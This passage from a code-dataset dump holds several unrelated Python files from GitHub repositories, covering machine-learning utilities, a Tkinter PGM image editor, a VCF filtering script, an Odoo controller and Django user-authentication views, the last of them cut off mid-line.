print_inter=50,\r\n val_inter=400)\r\n\r\n","repo_name":"Xie-JunWei/lstm-network","sub_path":"classify/classify_train.py","file_name":"classify_train.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"71150670171","text":"from wb0configs import configs\nfrom wb0configs.helpers import store_file, load_file\nfrom collections import defaultdict\nimport random\nimport torch\nfrom tqdm import tqdm\n\n\ndef pool_sections_embed(e_id_sec_embed):\n print(\"pool_sections_embed\")\n\n e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n #e_id_embed = load_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", ftype=\"pkl\")\n\n if e_id_embed == None:\n e_id_embed = dict()\n\n for e, sec in e_id_sec_embed.items():\n e_id_embed[e] = torch.mean(torch.stack(list(sec.values())), dim=0)\n\n store_file(config.get_path(\"task\") / \"entity_pooled\" / \"e_id_embed_tfidf\", e_id_embed, \"pkl\", \"csv\")\n return e_id_embed\n\n\n\ndef create_node_features(node_list, e_id_embed):\n print(\"create_node_features\")\n\n #node_features = torch.Tensor(len(node_list),768)\n node_features = dict()\n\n for i, (e_id, e_features) in enumerate(node_list):\n if e_id in e_id_embed.keys():\n e_emb = e_id_embed[e_id]\n #node_features[i] = e_emb\n node_features[e_id] = e_emb\n else: ## for some entities there exist no embeddings\n e_id= random.choice(node_list)[0]\n e_emb = e_id_embed[e_id]\n #node_features[i] = e_emb\n node_features[e_id] = e_emb\n\n return node_features\n\n\n\ndef create_edge_features(aggr_edge_list, c_id_ent_id_embed):\n print(\"create_edge_features\")\n\n #edge_features = torch.Tensor(len(aggr_edge_list), 768)\n edge_features = defaultdict(torch.FloatTensor)\n\n for i, (e_id_1, e_id_2, c_features) in tqdm(enumerate(aggr_edge_list)):\n c_ids = c_features[\"conflict_ids\"]\n for c_id in c_ids:\n #edge_features[i] = c_id_ent_id_embed[c_id][0]\n edge_features[(e_id_1, e_id_2)] = torch.cat((edge_features[(e_id_1, e_id_2)], c_id_ent_id_embed[c_id].view(1,-1)),0)\n edge_features[(e_id_1, e_id_2)] = torch.mean(edge_features[(e_id_1, e_id_2)], 0)\n return edge_features\n\n\nif __name__ == \"__main__\":\n\n config = configs.ConfigBase()\n\n node_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"node_list\", ftype = \"pkl\")\n e_id_sec_embed = load_file(config.get_path(\"entity_embed\") / \"e_id_sec_embed_tfidf\", ftype=\"pkl\")\n e_id_embed = pool_sections_embed(e_id_sec_embed)\n\n node_features = create_node_features(node_list, e_id_embed)\n\n aggr_edge_list = load_file(config.get_path(\"task\") / \"network_structure\" / \"aggr_edge_list\", ftype = \"pkl\")\n c_id_ent_id_embed = load_file(config.get_path(\"conflict_embed\") / \"c_id_ent_id_embed_tfidf\", ftype=\"pkl\")\n edge_features = create_edge_features(aggr_edge_list, c_id_ent_id_embed)\n\n store_file(config.get_path(\"task\") / \"network_features\" / \"node_features\", node_features, \"pkl\", \"csv\")\n store_file(config.get_path(\"task\") / \"network_features\" / \"edge_features\", edge_features, \"pkl\", \"csv\")\n\n","repo_name":"conflict-AI/conflictwiki","sub_path":"code/wb4task/task_construction/network_features.py","file_name":"network_features.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"}
+{"seq_id":"27898216650","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nfrom sklearn.metrics.pairwise import rbf_kernel, polynomial_kernel,linear_kernel\n\n\n\nclass centred_kernel(object):\n def __init__(self, kernel, centred=True, gamma=None, degree=3, coef0=1):\n self._kernel_type = kernel\n self._gamma = gamma\n self._degree = degree\n self._coef0 = coef0\n self._centred = centred\n\n def fit(self, X):\n self._X = X.copy()\n return self\n\n def fit_transform(self, X):\n self._X = X.copy()\n self._n = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, degree=self._degree, coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n\n \"\"\"\n sumK = np.sum(K, 0)\n K1 = 1. / self._n * np.tile(np.reshape(sumK, (-1, 1)), (1, self._n))\n K2 = 1. / self._n * np.tile(np.reshape(sumK, (1, -1)), (self._n, 1))\n self._K = K.copy()\n Ko = K - K1 - K2 + np.mean(K)\n else:\n Ko = K\n return Ko\n\n def transform(self, X):\n nt = X.shape[0]\n if self._kernel_type == 'rbf':\n K = rbf_kernel(X, self._X, gamma=self._gamma)\n elif self._kernel_type == 'poly':\n K = polynomial_kernel(X, self._X, degree=self._degree,\n coef0=self._coef0)\n elif self._kernel_type == 'linear':\n K = linear_kernel(X, self._X)\n if self._centred == True:\n\n \"\"\"\n YOUR CODE\n \"\"\"\n K1 = (K - 1. / self._n * np.ones((nt, self._n)).dot(self._K))\n K2 = np.eye(self._n) - 1. / self._n * np.ones((self._n, self._n))\n Ko = K1.dot(K2)\n else:\n Ko = K\n return Ko\n\n\n\ndef sorted_spectrum(A):\n complex_eig_val, complex_eig_vec = np.linalg.eig(A)\n eig_val = complex_eig_val.real\n orden = np.argsort(eig_val)[::-1]\n eig_val = eig_val[orden]\n eig_vec = complex_eig_vec.real\n eig_vec = eig_vec[:,orden]\n return eig_val, eig_vec\n\ndef kgda(K, y, tau = 1e-6):\n # K already centred!!\n n = K.shape[0]\n v_classes = np.unique(y)\n M_ = np.mean(K,1)\n P = len(v_classes)\n M_Mp = np.empty((n,P))\n #Sb\n Sb = np.zeros((n,n))\n Sw = np.zeros((n,n))\n for p in range(P):\n idx_class_p = np.where(y==v_classes[p])[0]\n n_p = len(idx_class_p)\n Kp = K[:,idx_class_p]\n Mp = np.mean(Kp,1)\n M_Mp[:,p] = Mp.copy()\n MpM_ = Mp - M_\n Sb += n_p* np.outer(MpM_, MpM_.T) # column * row\n Sw += 1./n_p* Kp.dot(Kp.T) - np.outer(Mp, Mp.T)\n #Sw inv\n if np.linalg.matrix_rank(Sw) < n:\n Sw += tau*np.eye(n)\n iSw = np.linalg.inv(Sw)\n AA = iSw.dot(Sb)\n DD2, UU2 = sorted_spectrum(AA)\n lam = DD2[:P-1]\n A = UU2[:,:P-1]\n VMp = A.T.dot(M_Mp)\n return A, VMp.T\n\ndef predict_kgda(K_test, A, Q, v_classes=None):\n # Ktest centred!!\n # Q projection of class means!!\n if v_classes is None:\n P = Q.shape[0]\n v_classes = np.array([int(cc) for cc in range(P)])\n U = K_test.dot(A)\n Distance_sample_mean = pairwise_distances(U, Q)\n closest_mean = np.argmin(Distance_sample_mean,1)\n output = np.array([v_classes[ii] for ii in closest_mean])\n return output, U","repo_name":"fredchettouh/uc3m_ml","sub_path":"kernel_mva/klda.py","file_name":"klda.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29133475410","text":"import numpy\r\nfrom tkinter import *\r\nfrom PIL import Image, ImageTk\r\n\r\n#Reading of the original file\r\ndef get_pgm_data():\r\n try:\r\n global filename\r\n filename = e.get()\r\n with open(filename, \"r\") as f:\r\n content = f.readlines()\r\n global size\r\n size=[]\r\n global Lmax \r\n Lmax=0\r\n global data\r\n data=[]\r\n global comments\r\n comments=[]\r\n for line in list(content):\r\n if line[0] == \"#\":\r\n comments.append(line)\r\n content.remove(line)\r\n if content[0].strip() != \"P2\":\r\n e.delete(0, END)\r\n status['text'] = \"Това не е PGM файл\"\r\n else:\r\n size = [int(el) for el in content[1].strip().split()]\r\n Lmax = int(content[2].strip())\r\n for line in content[3:]:\r\n for el in line.split():\r\n data.append(int(el))\r\n #get_file_button['state'] = DISABLED #if you remove the comment the program will work only with 1 file \r\n status['text'] = \"Файлът беше успешно зареден\"\r\n open_file['state'] = ACTIVE\r\n except OSError:\r\n status['text'] = \"Файлът не е намерен\"\r\n \r\n#Showing the original image on the screen\r\ndef open_original_pgm():\r\n original_image = Toplevel(root)\r\n original_image.iconbitmap(\"img\\\\icona.ico\")\r\n original_image.title(filename)\r\n original_image.resizable(0,0)\r\n original_image.transient(root)\r\n #using nympy array to get the image information\r\n new_data = numpy.array(data).reshape(size[1], size[0])\r\n #creating and displaying of the image on the screen\r\n img = ImageTk.PhotoImage(image = Image.fromarray(new_data))\r\n c = Canvas(original_image, width=size[0], height=size[1])\r\n c.pack()\r\n c.create_image(0,0, anchor=\"nw\", image = img)\r\n #right click mouse event for showing the additional field on the screen\r\n c.bind(\"\", enable_mod)\r\n koef_text = Label(original_image, text=\"коефициент:\")\r\n koef_text.pack(side=LEFT)\r\n\r\n k_v = Entry(original_image, width=15)\r\n k_v.pack(side=LEFT)\r\n\r\n stepen_text = Label(original_image,text=\"степен:\")\r\n stepen_text.pack(side=LEFT)\r\n\r\n img4 = PhotoImage(file=\"img\\\\adjust.png\")\r\n\r\n s_v = Entry(original_image, width=15)\r\n s_v.pack(side=LEFT)\r\n #calling the input validation function for both fields to ensure only numerals are entered\r\n reg = original_image.register(only_numbers)\r\n k_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n s_v.config(validate=\"key\", validatecommand=(reg, '%S'))\r\n #lambda function to use the inputs from the fields otherwise tkinter can't use them\r\n x = lambda:open_modified_pgm(float(k_v.get()), float(s_v.get()))\r\n\r\n global modify\r\n modify = Button(original_image, image=img4, compound=\"left\", text= \"Промени\", state=DISABLED, command=x)\r\n modify.pack(side=RIGHT)\r\n\r\n #positioning of the image according to the main window\r\n original_image.update_idletasks()\r\n windowWidth = original_image.winfo_reqwidth()\r\n windowHeight = original_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(original_image.winfo_screenwidth()/2 - windowWidth/2-(windowHeight/2))\r\n positionDown = int(original_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n original_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n original_image.mainloop()\r\n \r\n#Showing the moified image on the screen\r\ndef open_modified_pgm(k,s):\r\n modified_image = Toplevel(root)\r\n modified_image.iconbitmap(\"img\\\\icona.ico\")\r\n modified_image.title(filename.rstrip(\".pgm\")+\"_mod.pgm\")\r\n modified_image.resizable(0,0)\r\n modified_image.transient(root)\r\n global data1\r\n #creating and modifying of the new image \r\n data1 = numpy.array(data).reshape(size[1], size[0])\r\n with numpy.nditer(data1, op_flags=['readwrite']) as it:\r\n for x in it:\r\n x[...] = Lmax*(x/Lmax)**(k/s)\r\n img = ImageTk.PhotoImage(image = Image.fromarray(data1))\r\n c = Canvas(modified_image, width=size[0], height=size[1])\r\n c.pack()\r\n c.create_image(0,0, anchor=\"nw\", image = img)\r\n img5 = PhotoImage(file=\"img\\\\sd-card.png\")\r\n open_file = Button(modified_image, image=img5, compound=\"left\", text= \"Запази\", command=save_new_pgm, state=ACTIVE)\r\n open_file.pack(side=BOTTOM)\r\n modify['state'] = DISABLED\r\n status['text'] = \"Модификация на файла...\"\r\n #positioning of the image according to the main window\r\n modified_image.update_idletasks()\r\n windowWidth = modified_image.winfo_reqwidth()\r\n windowHeight = modified_image.winfo_reqheight()\r\n # Gets both half the screen width/height and window width/height\r\n positionRight = int(modified_image.winfo_screenwidth()/2 - windowWidth/2+(windowHeight/2))\r\n positionDown = int(modified_image.winfo_screenheight()/2 - windowHeight/2)\r\n # Positions the window in the center of the page.\r\n modified_image.geometry(\"+{}+{}\".format(positionRight, positionDown))\r\n\r\n modified_image.mainloop()\r\n \r\n#saving the modified mage as a file\r\ndef save_new_pgm():\r\n with open(filename.rstrip(\".pgm\")+\"_mod.pgm\", \"w\") as f:\r\n f.writelines(\"P2\\n\")\r\n f.writelines(\"# modified by PGM Read&Modify\\n\")\r\n for line in list(comments):\r\n #if the file was aleady modified by the program, making sure to remove the comment\r\n if line.strip() == \"# modified by PGM Read&Modify\":\r\n comments.remove(line)\r\n else:\r\n f.writelines(line)\r\n f.writelines(str(size[0])+\" \"+str(size[1])+\"\\n\")\r\n f.writelines(str(Lmax)+\"\\n\")\r\n #formating the image information so it can be dispalyed properly by any app\r\n for line in data1.tolist():\r\n f.writelines(str(line)[str(line).find(\"[\")+1 : str(line).find(\"]\")].replace(\",\", \"\")+\"\\n\") \r\n status['text'] = \"Файлът беше записан успешно като \"+filename.rstrip(\".pgm\")+\"mod.pgm\"\r\n\r\n#input validation to make sure the iput is either a number, a space or a dot f0r floatng numbers\r\ndef only_numbers(inp):\r\n if inp.isdigit():\r\n return True\r\n elif inp == \"\":\r\n return True\r\n elif inp == \".\":\r\n return True\r\n else:\r\n return False\r\n\r\n#changing the state of \"Change\" button(\"Промени\")\r\ndef enable_mod(event):\r\n modify['state'] = ACTIVE\r\n\r\n#using this to be able to call get_pgm_data via enter button\r\ndef call_get_pgm(event):\r\n get_pgm_data()\r\n\r\n#function to use in event to create a popup menu\r\ndef popup(event):\r\n try:\r\n popup_menu.tk_popup(event.x_root, event.y_root,0)\r\n finally:\r\n popup_menu.grab_release()\r\n\r\n\r\n\r\n#Creating of the main window\r\nroot = Tk()\r\nroot.iconbitmap(\"img\\\\icona.ico\")\r\nroot.title(\"PGM Read&Modify\")\r\nroot.resizable(0,0) #this disables rezising of the window\r\n#root.attributes(\"-toolwindow\",1) #hides the window control button under windows. As a side effect it also hides the program icon.\r\n#root.overrideredirect(1) #hides all the elements of the window control manager. Bad idea to use under winodws, works on linux or mac though.\r\n\r\n#Creating the top frame where the buttons and path to file elements reside\r\ntop_frame = Frame(root)\r\ntop_frame.pack(side=TOP, fill=X)\r\n\r\n#Creating of the bottom frame to hold the status bar element\r\nbottom_frame = Frame(root)\r\nbottom_frame.pack(side=BOTTOM, fill=X)\r\nfilename = Label(top_frame, text=\"Файл:\")\r\nfilename.pack(side=LEFT, anchor=W)\r\ne = Entry(top_frame, width=67)\r\ne.pack(side=LEFT)\r\ne.focus()\r\ne.bind(\"\", call_get_pgm)\r\n\r\n#Creates the popup menu with an option to exit the program\r\npopup_menu = Menu(root, tearoff=0)\r\npopup_menu.add_command(label=\"Exit\", command=root.destroy)\r\n\r\n#Creating the images for the buttons\r\nimg = ImageTk.PhotoImage(Image.open(\"img\\\\pgm.jpg\"))\r\nimg1 = PhotoImage(file = \"img\\\\file.png\")\r\nimg2 = PhotoImage(file =\"img\\\\display.png\")\r\nbackground = Label(bottom_frame,image=img)\r\nbackground.pack(side=TOP)\r\n\r\nstatus_text = Label(bottom_frame, text=\"статус:\", bd=1, relief=SUNKEN)\r\nstatus_text.pack(side=LEFT)\r\n\r\nstatus = Label(bottom_frame, text=\"Изчакване\", bd=1, relief=SUNKEN, anchor=W)\r\nstatus.pack(side=BOTTOM, fill=X)\r\n\r\nroot.bind(\"\", popup)\r\n\r\nget_file_button = Button(top_frame, image=img1, text=\"Отвори\", command=get_pgm_data, state=ACTIVE, compound=\"left\")\r\nget_file_button.pack(side=RIGHT)\r\n\r\nopen_file = Button(top_frame, image=img2, text= \"Покажи\", command=open_original_pgm, state=DISABLED, compound=\"left\")\r\nopen_file.pack(side=LEFT)\r\n\r\n#Centering of the main window according to screen resolution\r\nroot.withdraw()\r\nroot.update_idletasks()\r\nx = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\r\ny = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\r\nroot.geometry(\"+%d+%d\" % (x, y))\r\nroot.deiconify()\r\n\r\nroot.mainloop()\r\n","repo_name":"mazirah/PGM-Read-Modify","sub_path":"pgm read&modify.py","file_name":"pgm read&modify.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"26727665845","text":"\"\"\"Datasets utilities.\"\"\"\n\nfrom __future__ import annotations\n\nimport albumentations\nimport numpy as np\nimport tensorflow as tf\n\nfrom pathlib import PurePath\nfrom rasterio.io import MemoryFile\n\n\ndef augment_image_dataset(dataset: tf.data.Dataset,\n transforms: albumentations.Compose,\n augment_labels: bool = False) -> tf.data.Dataset:\n \"\"\"Augments a non-batched dataset using the given transforms.\"\"\"\n\n def _augment(image, label):\n if augment_labels:\n data = {\"image\": image, \"mask\": label}\n augmented = transforms(**data)\n return augmented[\"image\"], augmented[\"mask\"]\n else:\n data = {\"image\": image}\n augmented = transforms(**data)\n return augmented[\"image\"], label\n\n def _augment_tensors(image_tensor, label_tensor):\n return tf.numpy_function(func=_augment,\n inp=[image_tensor, label_tensor],\n Tout=[image_tensor.dtype, label_tensor.dtype])\n\n return dataset.map(_augment_tensors,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=True)\n\n\ndef tfrecords_as_geospatial_dataset(\n file_pattern: PurePath = None,\n batch_size: int = 1,\n repeat: bool = False,\n shuffle_buffer_size: int = 0,\n prefetch_buffer_size: int = tf.data.AUTOTUNE,\n transforms: albumentations.Compose = None,\n tfr_channel_keys: list[str] = None,\n tfr_channel_rewrite_map: dict[str, tuple[int, int]] = None,\n tfr_label_key: str = \"label\") -> tf.data.Dataset:\n \"\"\"Builds a geospatial raster dataset from TFRecords.\"\"\"\n\n if not file_pattern:\n raise ValueError(\"Must provide a non-empty file pattern.\")\n if not tfr_channel_keys:\n raise ValueError(\"Must provide a non-empty list of channel keys.\")\n\n shuffle = (shuffle_buffer_size > 0)\n deterministic = (not shuffle)\n\n if tfr_channel_rewrite_map:\n channel_rewrite_map = {\n tfr_channel_keys.index(k): v\n for k, v in tfr_channel_rewrite_map.items()\n }\n else:\n channel_rewrite_map = {}\n\n def _parse_example(serialized):\n \"\"\"Parses a serialized tf.train.Example into an (image, label) tuple.\"\"\"\n # pylint: disable=no-value-for-parameter\n\n all_keys = tfr_channel_keys + [tfr_label_key]\n example = tf.io.parse_example(\n serialized,\n {key: tf.io.FixedLenFeature([], tf.string) for key in all_keys})\n\n def _build_image_from_channels(*channels_data):\n img = []\n for idx, data in enumerate(channels_data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n channel = f.read(1)\n if idx in channel_rewrite_map:\n v_from, v_to = channel_rewrite_map[idx]\n channel[channel == v_from] = v_to\n img.append(channel)\n img = np.stack(img, axis=-1)\n return img\n\n img = tf.numpy_function(\n func=_build_image_from_channels,\n inp=[example[key] for key in tfr_channel_keys], # type: ignore\n Tout=tf.float32)\n\n def _read_label(data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n label = f.read(1)\n return np.expand_dims(label, axis=-1)\n\n label = tf.numpy_function(func=_read_label,\n inp=[example[tfr_label_key]],\n Tout=tf.uint8)\n\n return img, label\n\n ds = tf.data.TFRecordDataset.list_files(str(file_pattern), shuffle=shuffle)\n ds = ds.interleave(tf.data.TFRecordDataset,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n if repeat:\n ds = ds.repeat()\n if shuffle:\n ds = ds.shuffle(buffer_size=shuffle_buffer_size)\n ds = ds.map(_parse_example,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n if transforms:\n ds = augment_image_dataset(ds,\n transforms=transforms,\n augment_labels=True)\n\n options = tf.data.Options()\n options.experimental_distribute.auto_shard_policy = \\\n tf.data.experimental.AutoShardPolicy.DATA\n ds = ds.with_options(options)\n ds = ds.batch(batch_size=batch_size,\n drop_remainder=True,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n ds = ds.prefetch(prefetch_buffer_size)\n return ds\n","repo_name":"stefanistrate/drivendata-stac-overflow","sub_path":"stac_overflow/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"31320706422","text":"from odoo import http\nfrom odoo.addons.website_sale.controllers.main import WebsiteSale\nfrom odoo.http import request\n\n\nclass WebsiteSaleFrogblue(WebsiteSale):\n\n @http.route(['/shop/print'], type='http', auth=\"public\", website=True, sitemap=False)\n def print_saleorder(self, **kwargs):\n res = super(WebsiteSaleFrogblue, self).print_saleorder()\n sale_order_id = request.session.get('sale_last_order_id')\n if sale_order_id:\n pdf, _ = request.env.ref('frogblue_reports.report_frogblue_sale_order').sudo().render_qweb_pdf([sale_order_id])\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', u'%s' % len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)\n else:\n return res\n","repo_name":"liaohanzhen/custom_14","sub_path":"frogblue/frogblue_reports/controllers/website_sale/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30138300607","text":"\"\"\"\r\n\n\nCreate a function that, given a **string** with at least **three characters**\n, returns an array of its:\n\n 1. Length.\n 2. First character.\n 3. Last character.\n 4. Middle character, if the string has an odd number of characters. Middle TWO characters, if the string has an even number of characters.\n 5. Index of the second occurrence of the second character in the format **\"@ index #\"** and **\"not found\"** if the second character doesn't occur again.\n\n### Examples\n\n all_about_strings(\"LASA\") ➞ [4, \"L\", \"A\", \"AS\", \"@ index 3\"]\n \n all_about_strings(\"Computer\") ➞ [8, \"C\", \"r\", \"pu\", \"not found\"]\n \n all_about_strings(\"Science\") ➞ [7, \"S\", \"e\", \"e\", \"@ index 5\"]\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef all_about_strings(txt):\n newlist = []\n newlist.append(len(txt))\n newlist.append(txt[0])\n newlist.append(txt[-1])\n if len(txt) % 2 != 0:\n middle = len(txt) // 2\n newlist.append(txt[middle])\n else:\n middle = len(txt) // 2\n to_add = txt[middle-1] + txt[middle]\n newlist.append(to_add)\n temp = txt[1]\n if txt.count(temp) == 1:\n newlist.append('not found')\n return newlist\n else:\n txt = txt[0:1] + '$' + txt[2:]\n first_index = txt.index(temp)\n newlist.append('@ index {}'.format(first_index))\n return newlist\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"pEozhEet5c8aFJdso_24.py","file_name":"pEozhEet5c8aFJdso_24.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"8776967750","text":"from flask import flask, render_template \nfrom datetime import date\n\n\napp = flask(__name__)\n\n@app.route('/')\ndef show_nasa_pic():\n\ttoday = str(date.today())\n\tresponce = request.get('')\n\tdata= respond\t\n\n\n\nif __name__ =='__main__':\n\tapp.run(debug = True, host='127.0.0.1')\n","repo_name":"clayheart/teamedge-flask-projects","sub_path":"hello_flash/templates/APP.PY","file_name":"APP.PY","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70530520412","text":"############\n## INIT ##\n############\n\nfrom __future__ import print_function\nimport sys, tabix, time, re\n\nprog_name = sys.argv[0].split('/')[-1]\nif len(sys.argv) == 3:\n in_vcf = sys.argv[1]\n in_db = sys.argv[2] # bed.gz\n print(\"[%s] %s run initiated.\" % (time.ctime(), prog_name), file=sys.stderr)\nelse:\n sys.exit(\"\\nUsage: python %s \\n\" % prog_name)\n# fi\n\n\n## Module\ndef has_indel(ref, alts):\n flag_has_indel = False\n ref_len = len(ref)\n\n for alt in alts:\n if ref_len == len(alt) == 1:\n continue\n else:\n flag_has_indel = True\n # fi\n # for end \n return flag_has_indel\n# fed\n\n# Init tabix\ndb = tabix.open(in_db)\n\n# Proc VCF\nfor line in open(in_vcf, \"r\"):\n if line.startswith('#'):\n print(line.strip())\n continue\n field = line.strip().split('\\t')\n chrom = field[0]\n chrom_id = chrom.replace(\"chr\", '')\n chrom_id = 'M' if chrom_id == \"MT\" else chrom_id\n one_pos = int(field[1])\n chr_pos = \"%s:%s\" % (chrom_id, one_pos)\n ref = field[3]\n alts = field[4].split(',')\n query_db = \"chr%s:%s-%s\" % (chrom_id, one_pos, one_pos)\n flag_has_indel = has_indel(ref, alts)\n if not flag_has_indel: # if var has no indel\n print(line.strip())\n continue\n\n try:\n results = db.querys(query_db) # send query\n iter_cnt = sum(1 for _ in results)\n except tabix.TabixError:\n print(line.strip())\n continue\n\n # If at least 1 STR present\n if iter_cnt > 0:\n continue\n elif iter_cnt == 0:\n print(line.strip())\n continue\n else:\n sys.exit(\"ERROR: iter_cnt = %s\" % iter_cnt)\n# for line end\n","repo_name":"soymintc/rainbow","sub_path":"scripts/dbflt_str.py","file_name":"dbflt_str.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"36758840014","text":"import sklearn as sk\nfrom sklearn import datasets as ds\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ntrainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TrainingDataset\"\ntestPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TestingDataset\"\n\ngradeTrain = ds.load_files(trainPath,load_content = True,encoding = 'utf-8')\ngradeTest = ds.load_files(testPath,load_content= True,encoding = 'utf-8')\ngrade3CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade3-Certain.txt\"\ngrade4CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade4-Certain.txt\"\ngrade3CertainList = []\ngrade4CertainList = []\n\n#['Grade 1 or 2', 'Grade 3', 'Grade 4', 'Non-Existent'] - target_names\n# CountVectorizer- Turn text in matrix of token counts\n# Tfidf - Calculate term frequency times inverse document frequency\n\n\n'''Create and train a classifier'''\ndef trainClf():\n global clf\n # Pipeline to quickly train classifier\n clf = Pipeline([('vect',CountVectorizer()),\n ('tfidf',TfidfTransformer()),\n ('clf',MultinomialNB())])\n\n clf = clf.fit(gradeTrain['data'],gradeTrain['target'])\n\n\n'''Predict on Test Data set'''\ndef predictTest():\n predicted = clf.predict(gradeTest['data'])\n certain = checkCertain(gradeTest['data'])\n for change in certain:\n predicted[change[0]] = change[1]\n print(\"TOTAL ACCURACY: \" + str(accuracy_score(gradeTest['target'],predicted)))\n for x in range(len(predicted)):\n index = gradeTest['target'][x]\n pIndex = predicted[x]\n print(gradeTest['data'][x] + \"| ACTUAL:\" +\n gradeTest['target_names'][index] + \" PREDICTED: \"\n + gradeTest['target_names'][pIndex])\n\n'''Loads/Maps the text files containing the words which determines the grade'''\ndef loadCertain(path,list):\n rObject = open(path, 'r')\n for line in rObject:\n line = line.strip()\n line = line.lower()\n list.append(line)\n\n'''Checks if the data passed in contains terms that are specific to a certain grade'''\ndef checkCertain(data):\n certain = []\n #certain indicator - (index,grade)\n for x in range(len(data)):\n temp = ()\n for indicator in grade3CertainList:\n if indicator in data[x]:\n temp = (x,1)\n for i in grade4CertainList:\n if i in data[x]:\n print(i)\n temp = (x,2)\n if temp:\n certain.append(temp)\n return certain\n\nloadCertain(grade3CertainPath,grade3CertainList)\nloadCertain(grade4CertainPath,grade4CertainList)\n\ntrainClf()\npredictTest()","repo_name":"Unagifan/GITGrader","sub_path":"GITGradeClassifier.py","file_name":"GITGradeClassifier.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"23460529031","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework import generics, filters, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework import permissions\nfrom rest_framework.decorators import api_view\nfrom rest_framework.generics import (\n CreateAPIView,\n RetrieveUpdateDestroyAPIView, ListAPIView,\n)\n\nfrom user.models import User\nfrom user.serializers import (\n UserSerializer,\n UserLoginSerializer,\n UserLogoutSerializer,\n UserProfileSerializer,\n FollowingSerializer,\n)\n\n\n@api_view([\"GET\"])\ndef user_endpoints(request):\n base_url = request.build_absolute_uri(\"/api/user/\")\n endpoints = {\n \"Create user\": f\"{base_url}register/\",\n \"Login\": f\"{base_url}login/\",\n \"Logout\": f\"{base_url}logout/\",\n \"Token\": f\"{base_url}token/\",\n \"Refresh Token\": f\"{base_url}token/refresh/\",\n \"Verify Token\": f\"{base_url}token/verify/\",\n \"My profile\": f\"{base_url}me/\",\n \"Search Users\": f\"{base_url}users/search/\",\n \"Update/Delete User Profiles\": f\"{base_url}profiles//\",\n \"Following Users\": f\"{base_url}following/\",\n \"User's Followers\": f\"{base_url}/followers/\",\n \"My profiles\": f\"{base_url}profile/\",\n \"User Profiles\": f\"{base_url}all/\",\n \"User's Profile\": f\"{base_url}/\",\n }\n return Response(endpoints)\n\n\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n return obj.user == request.user\n\n\nclass CreateUserView(CreateAPIView):\n serializer_class = UserSerializer\n\n\nclass UserLoginView(APIView):\n serializer_class = UserLoginSerializer\n\n def post(self, request):\n serializer = 